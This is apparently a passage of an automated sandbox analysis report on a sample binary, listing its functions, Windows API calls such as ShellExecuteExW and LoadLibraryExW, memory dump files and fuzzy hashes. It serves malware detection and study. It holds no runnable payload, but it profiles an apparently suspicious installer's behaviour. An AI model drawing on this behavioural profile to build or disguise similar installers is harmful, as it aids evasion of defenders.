Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C

Function 00406915 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
GetProcAddress.KERNEL32(00000000,?), ref: 00406942

Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
Part of subcall function 004068A5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A

Function 00406011 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00405FEC Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694

Function 00405ACF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D

Function 004060C3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4

Function 00406094 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9

Function 004044EC Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D

Function 00405B47 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B56

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29

Function 004044D5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08

Function 004034B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19

Function 00403B19 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A4C,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B24

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 4fffb8c71d51b546a7e2127151d0507ebb76f0821c6fee4e4994e39edc86062b
Instruction ID: 13c518e9ac0cc08fdea238e66527cd13fc05b27a1f87e487e8402aab48b93ad6
Opcode Fuzzy Hash: 4fffb8c71d51b546a7e2127151d0507ebb76f0821c6fee4e4994e39edc86062b
Instruction Fuzzy Hash: D1C0223010830882D0203F389E4FA093A289700339B608325B0B9B00F2C73CA24A042D

Non-executed Functions

Function 00404991 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049E0
SetWindowTextW.USER32(00000000,?), ref: 00404A0A
SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
CoTaskMemFree.OLE32(00000000), ref: 00404AC6
lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404AF8
lstrcatW.KERNEL32(?,: Completed), ref: 00404B04
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16

Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78

Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
Part of subcall function 004067CF: CharNextW.USER32(?,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
Part of subcall function 004067CF: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859

GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4

Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A

Strings

A, xrefs: 00404AB4
: Completed, xrefs: 00404AF2, 00404AF7, 00404B02
Genetics Announcements Mess Premier Appliance Structures , xrefs: 004049AA

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$Genetics Announcements Mess Premier Appliance Structures
API String ID: 2624150263-3287170963
Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
